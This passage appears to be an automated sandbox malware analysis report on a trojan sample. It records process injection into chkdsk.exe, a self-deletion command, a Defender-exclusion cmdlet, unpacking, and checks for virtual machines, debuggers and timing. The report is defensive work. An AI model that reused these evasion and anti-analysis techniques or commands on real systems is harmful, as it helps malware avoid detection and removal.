Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA85E0 NtCreateFile, 10_2_04AA85E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA8690 NtReadFile, 10_2_04AA8690
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA87C0 NtAllocateVirtualMemory, 10_2_04AA87C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA8710 NtClose, 10_2_04AA8710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA85DA NtCreateFile, 10_2_04AA85DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA870C NtClose, 10_2_04AA870C
Sample file is different than original file name gathered from version info
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GV8EJooYMIgEnEk.exe Virustotal: Detection: 60%
Source: GV8EJooYMIgEnEk.exe Metadefender: Detection: 20%
Source: GV8EJooYMIgEnEk.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.Identifier Jump to behavior
Source: GV8EJooYMIgEnEk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@7/5
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: GV8EJooYMIgEnEk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GV8EJooYMIgEnEk.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: GV8EJooYMIgEnEk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: GV8EJooYMIgEnEk.exe, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_07164FF9 push es; retf 0_2_0716500D
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0716C325 push FFFFFF8Bh; iretd 0_2_0716C327
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B822 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B82B push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B88C push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00419178 push ebp; iretd 3_2_0041917B
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041A10B push edi; retf 3_2_0041A10C
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041A2A7 push ebx; retf 3_2_0041A2AA
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00415C52 pushad ; ret 3_2_00415C5A
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041CCCE push es; iretd 3_2_0041CCD0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DDD0D1 push ecx; ret 10_2_04DDD0E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AACCCE push es; iretd 10_2_04AACCD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA5C52 pushad ; ret 10_2_04AA5C5A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB7D5 push eax; ret 10_2_04AAB828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB88C push eax; ret 10_2_04AAB892
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB82B push eax; ret 10_2_04AAB892
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB822 push eax; ret 10_2_04AAB828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAA10B push edi; retf 10_2_04AAA10C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA9178 push ebp; iretd 10_2_04AA917B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAA2A7 push ebx; retf 10_2_04AAA2AA
Source: initial sample Static PE information: section name: .text entropy: 7.78260076892

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632 Thread sleep time: -35216s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5248 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\chkdsk.exe API coverage: 9.5 %
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 35216 Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging
barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Enables debug privileges
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h] 10_2_04E06CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h] 10_2_04E06CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h] 10_2_04E06CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h] 10_2_04E414FB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h] 10_2_04E58CD6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h] 10_2_04D9849B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h] 10_2_04DBA44B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h] 10_2_04E1C450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h] 10_2_04E1C450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h] 10_2_04DA746D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h] 10_2_04E5740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h] 10_2_04E5740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h] 10_2_04E5740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] 10_2_04E06C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] 10_2_04E06C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] 10_2_04E06C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] 10_2_04E06C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h] 10_2_04DBBC2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] 10_2_04E4FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] 10_2_04E4FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] 10_2_04E4FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] 10_2_04E4FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h] 10_2_04E38DF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h] 10_2_04D9D5E0
